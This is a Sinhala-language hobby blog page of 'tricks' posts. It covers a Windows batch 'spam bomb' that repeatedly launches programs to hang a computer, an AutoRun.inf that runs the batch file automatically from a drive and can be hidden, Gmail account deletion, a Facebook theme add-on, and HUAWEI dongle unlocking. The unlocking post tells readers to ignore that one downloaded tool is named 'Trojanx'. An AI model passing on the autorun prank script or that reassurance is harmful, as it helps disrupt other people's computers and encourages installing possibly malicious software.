Spam Bomb : Part 2

Autorun Spam Bomb

G-Mail Account Delete කරමු..

Let's delete Gmail Account

Harry Potter and the Deathly Hallows: Part 1

Download Harry Potter and the Deathly Hallows: Part 1 (2010) BRRip 650mb

Death Race 2

රේස් එකේ ඉන්න අනිත් අයව මරාගෙන තමයි මේක දිනන්නෙ. ඒකයි මේකට 'Death Race' කියන්නෙ.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Showing posts with label Trix. Show all posts
Showing posts with label Trix. Show all posts

Monday, May 30, 2011

Spam Bomb : Part 2

       කලින් කිව්ව spam bomb එක autorun වෙන්න හදන හැටි තමා දැන් කියන්නෙ.
මුලින් ම notepad එක open කරල,

[AutoRun]
OPEN=NAME.BAT

       ඉහත තියෙන name කියන එකට ඕගොල්ලො .bat file එක save කරපු නම දාන්න. ඊට පස්සෙ කලින් save කරපු spam bomb එක තියෙන තැනට AutoRun.inf නමින් save කරන්න.
       කැමති නම් මේක hide කරන්නත් පුළුවන්.............

Thursday, May 26, 2011

G-Mail Account Delete කරමු..

Gmail Account delete කරන එක හරිම ලේසියි. එහෙනම් බලා ගන්නකෝ.
මුලින් ම account එකට log වෙලා, account setting යන්න. ඊට පස්සෙ පහළ කියල තියන විදියට කරන්න.
 අන්තිමේ දි මේ  හැම එකකට ම හරි දාල email එකේ password එක type කරන්න.ඊට පස්සෙ තියෙන වාක්‍ය දෙකටත් හරි දාල delete google account, click කරන්න. දැන් වැඩේ හරි....කොහොම ද වැඩේ comment පාරක් දාන්නකෝ..............

Tuesday, May 24, 2011

පුංචි පහේ Spam Bomb එකක් හදමු...



මේකෙ කරන්න තියෙන්නෙ හරිම ලේසි වැඩක්. එහෙනම් කරල බලමුකෝ...

මුලින් ම පහළ තියෙන එක Notepad එක‍ට copy, paste කරන්න.

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer

ඊට පස්සෙ මේක .bat File එකක් විදියට Save කරන්න. මේක වැරදිලා හරි double click කරල run වුණොත් computer එකේ තියෙන internet explore වැනි මෙහි සදහන් වෙලා තියෙන ඒව run වෙනව.

මෙහි Start යනුවෙන් තියන ඒවා වැඩි වාර ගණනක් copy කරන එක හොදයි.
උදා:
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

මේක run වුණා කියල computer එකට හානියක් වෙන්නෙ නෑ. හැබැයි මේකෙ Start වලින් තියෙන ඒව හුගක් copy කරල තිබුණොත් Computer එක Stuck වෙන්න පුළුවන්. ඔයාල මේක test කරල බලන්නකෝ Start ඒව copy කරන්නෙ නැතිව....

Thursday, November 4, 2010

FB Theme එක වෙනස් කරමු ද?


හුග දෙනෙක් ට ප්‍රශ්නයක් වෙලා තියෙන්නෙ Facebook Theme එක වෙනස් කරන විදියනේ.ඔන්න ඒ වැඩෙත් දැන් ප්‍රශ්නයක් නැතුව කරගන්න පුළුවන්.මං දැන් කියන්න යන්නෙ ඒක කරන විදිය.....

1වන පියවර - මුලින් ම ඕගොල්ලන්ගේ FB Account එකට Log වෙන්නකෝ.


2වන පියවර - ඊට පස්සෙ මෙන්න මේ Site
එකට ගොඩවෙන්නකෝ.
Facebook Theme Change
3වන පියවර - මේකෙ තියෙන 'IT'S FREE!' කියන එක Click කරන්න. ඊට පස්සෙ එන Site එකේ තියෙන විදියට මේ Software එක Install කරගන්න. (ඕගොල්ලන්ගෙ Browser එක Firefox නම් තමා මේක කරන්න පුළුවන්)

4වන පියවර -Install කරාට පස්සෙ පල්ලෙහා තියෙන Site එකට යන්නකෝ..
Facebook Theme Change

5වන පියවර - මේකෙ තියෙන Theme වලින් ඔයාලට කැමති එකක් Install කරගන්න පුළුවන්...

Install කරාට පස්සෙ Facebook එකට ඔයාල දාපු Theme එක එනවා........ එහෙනම් දාගෙනම බලන්නකෝ....

Thursday, October 21, 2010

HUAWEI ඩොන්ගල් Unlock කරමු....

රවීගේ අඩවියෙන් අද සිට ආරම්භ වන අලුත් ම වැඩ සටහන තමයි 'ක්‍රම සහ විධි' කියන්නෙ. ඔයාල නොදන්න දෙවල් ගැන පොඩි දැනුමක් දීම තමයි මේකෙ ප්‍රධාන අරමුණ. මේකෙන් දාන 'මංගල ලිපි' මොකක් ද කියල එහෙනම් බලන්නකෝ........

HUAWEI ඩොන්ගල් Unlock කරමු....

සමහර විට ඔයාල මේ ගැන දැනටමත් දන්නව ඇති. කමක් නෑ.. මේ ගැන දන්නැති අයට මේක හුඟක් ප්‍රයෝජනවත්. මං අද කියන්න යන්නෙ ඩොන්ගල් අන්ලොක් කරන විදිය ගැන. හැබැයි HUAWEI ඩොන්ගල් විතරයි. හරි එහෙනම් කරන විදිය බලාගන්නකෝ...

මුලින් මේක කරන්න කලින් Software දෙකක් Download කරන්න ඕන. ඒව අවශ්‍ය වෙනව මේක අන්ලොක් කරන්න.
HUWEI Modem Code Writer මෘදුකාංගය
මේ Software දෙක Download කරගන්නකෝ.. මේකෙ මුල් Software එකෙන් කරන්නෙ Unlock Code එක හොයාගන්න එක. දෙවැනි Software එකෙන් කරන්නෙ ඩොන්ගල් එක Unlock කරන එක. මං ඔයාලට ඩොන්ගල් එක අන්ලොක් කරන විදිය සරලව කියන්නම්.
අන්ලොක් කරන්න කලින් ඩොන්ගල් එකේ 'IMEI' කෝඩ් එක හොයාගන්න ඕන. මේ කෝඩ් එක ඩොන්ගල් එකේ පිටිපස්සේ ප්‍රින්ට් කරල තියෙනවා. නැත්නම් ඩොන්ගල් එක ගන්නකොට ලැබෙන 'පොතේ' (Manual) මේ කෝඩ් එක තියෙනවා. මේ‍ කෝඩ් එක අංක 15කින් යුක්ත යි. මේක හොයාගන්නකෝ..
ඒ වගේ ම මං දීල තියෙන 'HUAWEI Unlocker Software' එක වැඩ කරන්න නම් අවම වශයෙන් 'NET Framework 3.0 සංස්කරණය තියෙන්න ඕන. නැත්නම් මං දෙන 3.5 සංස්කරණය නොමිලේ ම Download කරගෙන Install කරගන්න. Install කරද්දී Internet සම්බන්ධය නැති කරගන්න එපා. මොක ද Install වෙන්නෙ Internet එක හරහා නිසා. ඔයාලට ඕන නම් NET Framework 4 අලුත් ම සංස්කරණය නොමිලේ ම ලබා ලබාගන්න පුළුවන්. මේ දෙක ම කරාට පස්සේ,

1වන පියවර - ඩොන්ගල් එක USB Port එක‍ට සවි කරන්න.
2වන පියවර - මං දීල තියෙන 'HUAWEI Unlocker Software එක Double Click කරල Open කරන්න.
එතකොට මේ Window එකක් දකින්න පුළුවන්.
3වන පියවර - මේ Window එකේ Enter IMEI කියන එකට ඉස්සරහින් තියෙන හිස් කොටුවෙ IMEI කෝඩ් එක Type කරන්න.
4වන පියවර - Caculate බොත්තම Click කරන්න.
එතකොට Unlock Code & Flash Code දෙකට ඉස්සරහ හිස් කොටුවේ කෝඩ් දෙකක් එනවා.මේකෙන් අන්ලොක් කරන්න අවශ්‍ය වෙන්නෙ 'Unlock Code' එක විතරයි. මේකෙ නමත් එක්ක Trojanx කියල තිබුනට බය වෙන්න එපා. මේක වයිරස් නෙවෙයි.
5වන පියවර - මං දීල තියෙන HUAWEI Unlocker Code Software එක Open කරන්න.
ඒ Software එක මේ වගේ..
6වන පියවර - මේකෙ තියෙන 'Please Select Com Port' කියන එක Click කරන්න.
එතකොට මේ විදියට එනව..
7වන පියවර - මෙහි 'Detect' බට්න් එක Click කරන්න.
එවිට Computer එක විසින් ඩොන්ගල් එක ස්වයංක්‍රීයව ‍සොයාගන්නවා.
8වන පියවර - ඉන්පසු Accept බට්න් එක ඔබන්න.
9වන පියවර - දැන් 'Unlock Modem' කියන බට්න් එක Click කරන්න.
එතකොට එනව Unlock Code එක Type කරන Window එක.
10වන පියවර - දැන් කලින් Software එකෙන් ගත්ත Unlock Code එක මේකෙ Type කරන්න.
එවිට මේ Software එකෙන් Command එකක් යවනව ඩොන්ගල් එක‍ට, ඩොන්ගල් එක අන්ලොක් කරන්න කියල. ඉන්පසු ඩොන්ගල් එක Unlock වෙනවා.


මේක අන්ලොක් වෙලා ද කියල බලාගන්න පුළුවන්, මේකට වැඩ කරපු නැති SIM එකක් දාල. ඕගොල්ලන්ට මේක කරද්දී ප්‍රශ්නයක් ආවොත්, Comment මගින් ප්‍රශ්න අහන්නකෝ. එහෙනම් වැඩේ කරල බලන්න......